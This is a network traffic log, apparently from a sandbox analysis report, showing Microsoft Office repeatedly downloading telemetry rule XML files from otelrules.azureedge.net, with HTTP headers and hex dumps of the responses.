                                                  2024-10-31 19:50:56 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  132192.168.2.45244513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:57 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1388
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                  ETag: "0x8DC582BDBD9126E"
                                                  x-ms-request-id: e02f31dd-001e-0082-0849-275880000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195056Z-16849878b78tg5n42kspfr0x480000000a0g00000000d9a3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:57 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  133192.168.2.45244613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:56 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:57 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1415
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                  ETag: "0x8DC582BE7C66E85"
                                                  x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195057Z-16849878b78z2wx67pvzz63kdg00000008n000000000b94f
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:57 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  134192.168.2.45244713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:57 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:57 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1378
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                  ETag: "0x8DC582BDB813B3F"
                                                  x-ms-request-id: fad7475d-801e-002a-7d7c-2a31dc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195057Z-15b8d89586fpccrmgpemqdqe5800000004yg000000002e76
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:57 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  135192.168.2.45244813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:57 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:57 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1405
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                  ETag: "0x8DC582BE89A8F82"
                                                  x-ms-request-id: 622dd3a6-e01e-0003-140d-260fa8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195057Z-16849878b7828dsgct3vrzta7000000008c000000000m689
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:57 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  136192.168.2.45244913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:57 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:57 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1368
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                  ETag: "0x8DC582BE51CE7B3"
                                                  x-ms-request-id: dbdc188e-001e-002b-6b28-2799f2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195057Z-16849878b78wv88bk51myq5vxc0000000a9000000000d7n5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:57 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  137192.168.2.45245013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:57 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:57 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1415
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                  ETag: "0x8DC582BDCE9703A"
                                                  x-ms-request-id: c9775f7b-401e-0016-2424-2a53e0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195057Z-159b85dff8fbbwhzhC1DFWwpe800000002k0000000005c2b
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:57 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  138192.168.2.45245113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:57 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:58 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1378
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                  ETag: "0x8DC582BE584C214"
                                                  x-ms-request-id: c49cf7be-b01e-0002-3880-271b8f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195057Z-16849878b78z2wx67pvzz63kdg00000008p0000000006x4z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:58 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  139192.168.2.45245213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:58 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:58 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:58 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1407
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                  ETag: "0x8DC582BE687B46A"
                                                  x-ms-request-id: a6706070-501e-005b-556d-28d7f7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195058Z-15b8d89586f42m673h1quuee4s0000000e0g00000000gbsn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:58 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  140192.168.2.45245313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:58 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:58 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:58 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1370
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                  ETag: "0x8DC582BDE62E0AB"
                                                  x-ms-request-id: 4fba8623-501e-0064-4a33-2b1f54000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195058Z-15b8d89586fxdh48ft0acdbg4400000003t000000000a499
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:58 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  141192.168.2.45245413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:58 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:58 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:58 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE156D2EE"
                                                  x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195058Z-16849878b78tg5n42kspfr0x480000000a0000000000gunt
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:58 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  142192.168.2.45245513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:58 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
